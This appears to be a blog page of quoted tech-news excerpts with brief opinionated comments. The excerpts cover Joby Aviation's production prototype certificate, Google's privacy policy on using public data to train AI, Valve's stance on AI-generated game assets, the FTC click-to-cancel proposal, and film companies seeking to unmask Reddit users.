Joby Aviation, Inc. (NYSE:JOBY), a company developing all-electric aircraft for commercial passenger service, today announced it has received a Special Airworthiness Certificate for the first aircraft built at its Pilot Production Line in Marina, California. Issued by the Federal Aviation Administration, the certificate allows Joby to begin flight testing of its first production prototype.

The aircraft is expected to become the first ever eVTOL aircraft to be delivered to a customer when it moves to Edwards Air Force Base in 2024 to be operated by Joby as part of the Company’s Agility Prime contract with the U.S. Air Force, worth up to $131 million.

[…]

Joby has been flying full size aircraft since 2017 and its pre-production prototype aircraft have flown more than 30,000 miles since 2019. Today’s production prototype builds on that experience and marks another important step toward achieving FAA certification and production at scale.

[…]

Joby plans to begin commercial passenger operations in 2025 and recently partnered with Delta Air Lines to deliver seamless, emissions-free travel for Delta customers traveling to and from airports.

[…]

The aircraft will now undergo initial flight testing before being delivered to Edwards Air Force Base, California, where it will be used to demonstrate a range of potential logistics use cases.

Source: Joby Marks Production Launch, Receives Permit to Fly First Aircraft Built on Production Line | Joby

Google Says It’ll Scrape Everything You Post Online for AI

Google updated its privacy policy over the weekend, explicitly saying the company reserves the right to scrape just about everything you post online to build its AI tools. If Google can read your words, assume they belong to the company now, and expect that they’re nesting somewhere in the bowels of a chatbot.

“Google uses information to improve our services and to develop new products, features and technologies that benefit our users and the public,” the new Google policy says. “For example, we use publicly available information to help train Google’s AI models and build products and features like Google Translate, Bard, and Cloud AI capabilities.”

Fortunately for history fans, Google maintains a history of changes to its terms of service. The new language amends an existing policy, spelling out new ways your online musings might be used for the tech giant’s AI tools work.

[…]

This is an unusual clause for a privacy policy. Typically, these policies describe ways that a business uses the information that you post on the company’s own services. Here, it seems Google reserves the right to harvest and harness data posted on any part of the public web, as if the whole internet is the company’s own AI playground. Google did not immediately respond to a request for comment.

[…]

Source: Google Says It’ll Scrape Everything You Post Online for AI

The rest of the article goes into Gizomodo’s luddite War Against AI ™ luddite language, unfortunately, because it misses the point that basically this is nothing much new – Google has been able to use any information you type into any of their products for pretty much any purpose (eg advertising, email scanning, etc) for decades (which is why I don’t use Chrome). However it is something that most people simply don’t realise.

Valve All But Bans AI-Generated Content from Steam Games

Game developers looking to distribute their playable creations via Valve’s popular Steam hub may have trouble if they’re looking to use AI during the creative process. The game publisher and distributor says that Steam will no longer tolerate products that were generated using copyright-infringing AI content. Since that’s a policy that could apply to most—if not all—of AI-generated content, it’s hard not to see this move as an outright AI ban by the platform.

Valve’s policy was initially spotted by a Redditor who claimed that the platform had rejected a game they submitted over copyright concerns. “I tried to release a game about a month ago, with a few assets that were fairly obviously AI generated,” said the dev, revealing that they’d been met with an email stating that Valve could not ship their game unless they could “affirmatively confirm that you own the rights to all of the IP used in the data set that trained the AI to create the assets in your game.” Because the developer could not affirmatively prove this, their game was ultimately rejected.

When reached for comment by Gizmodo, Valve spokesperson Kaci Boyle clarified that the company was not trying to discourage the use of AI outright but that usage needed to comply with existing copyright law.

“The introduction of AI can sometimes make it harder to show that a developer has sufficient rights in using AI to create assets, including images, text, and music,” Boyle explained to Gizmodo. “In particular, there is some legal uncertainty relating to data used to train AI models. It is the developer’s responsibility to make sure they have the appropriate rights to ship their game.”

[…]

Valve’s decision to nix any game that uses problematic AI content is obviously a defensive posture designed to protect against any unforeseen legal developments in the murky regulatory terrain that is the blossoming AI industry.

[…]

A legal fight is brewing over the role of copyrighted materials in the AI industry. Large language models—the high-tech algorithms that animate popular AI products like ChatGPT and DALL-E—have been trained with massive amounts of data from the web. As it turns out, a lot of that data is copyrighted material—stuff like works of art, books, essays, photographs, and videos. Multiple lawsuits have argued that AI companies like OpenAI and Midjourney are basically stealing and repackaging millions of people’s copyrighted works and then selling a product based on those works; those companies, in turn, have defended themselves, claiming that training an AI generator to spit out new text or imagery based on ingested data is the same thing as a human writing a novel after having been inspired by other books. Not everybody is buying this claim, leading to the growing refrain “AI is theft.”

Source: Valve All But Bans AI-Generated Content from Steam Games

So the problem really is that the law is not clear and Valve has decided to pre-empt the law by saying that they have a punitive vision of copyright law beforehand. That’s not so strange considering the stranglehold copyright law has in the West, which goes to show yet again: copyright law – allowing people to coast through on past work forever – is stifling innovation

Big Business Isn’t Happy With FTC’s ‘Click to Cancel’ Proposal – says people enjoy tortuous cancellations

The Federal Trade Commission’s recent proposal to require that companies offer customers easy one-click options to cancel subscriptions might seem like a no-brainer, something unequivocally good for consumers. Not according to the companies it would affect, though. In their view, the introduction of simple unsubscribe buttons could lead to a wave of accidental cancellations by dumb customers. Best, they say, to let big businesses protect customers from themselves and make it a torment to stop your service

Those were some of the points shared by groups representing major publishers and advertisers during the FTC’s recent public comment period ending in June. Consumers, according to the Wall Street Journal, generally appeared eager for the new proposals which supporters say could make a dent in tricky, bordering-on deceptive anti-cancellation tactics deployed by cable companies, entertainment sites, gyms, and other businesses who game out ways to make it as difficult as possible to quickly quit a subscription

[…]

Source: Big Business Isn’t Happy With FTC’s ‘Click to Cancel’ Proposal

Film companies demand names of Reddit users who discussed piracy in 201

Reddit is fighting another attempt by film companies to unmask anonymous Reddit users who discussed piracy.

The same companies lost a previous, similar motion to identify Reddit users who wrote comments in piracy-related threads. Reddit avoided revealing the identities of eight users by arguing that the First Amendment protected their right to anonymous speech.

Reddit is seeking a similar outcome in the new case, in which the film companies’ subpoena to Reddit sought “Basic account information including IP address registration and logs from 1/1/2016 to present, name, email address and other account registration information” for six users who wrote comments on Reddit threads in 2011 and 2018.

[…]

Film companies, including Bodyguard Productions and Millennium, are behind both lawsuits. In the first case, they sued Internet provider RCN for allegedly ignoring piracy on its broadband network. They sued Grande in the second case. Both RCN and Grande are owned by Astound Broadband.

Reddit is a non-party in both copyright infringement cases filed against the Astound-owned ISPs, but was served with subpoenas demanding information on Reddit users. When Reddit refused to provide all the requested information in both cases, the film companies filed motions to compel Reddit to respond to the subpoenas in US District Court for the Northern District of California.

[…]

Reddit’s response to the latest motion to compel, which was previously reported by TorrentFreak today, said the film companies “have already obtained from Grande identifying information for 118 of Grande’s ‘top 125 pirating IP addresses.’ That concession dooms the Motion; Plaintiffs cannot possibly establish that unmasking these six Reddit users is the only way for Plaintiffs to generate evidence necessary for their claims when they have already succeeded in pursuing an alternative and better way.”

The evidence obtained directly from Grande is “far better than what they could obtain from Reddit,” Reddit said, adding that plaintiffs can subpoena the 118 subscribers that are known to have engaged in copyright infringement instead.

Reddit said the six users whose identities are being sought “posted generally about using Grande to torrent. These six Reddit users responded to two threads in a subreddit for the city of Austin, Texas. The majority of the users posted over 12 years ago while the remaining two posted five years ago.”
[…]

Source: Film companies demand names of Reddit users who discussed piracy in 2011 | Ars Technica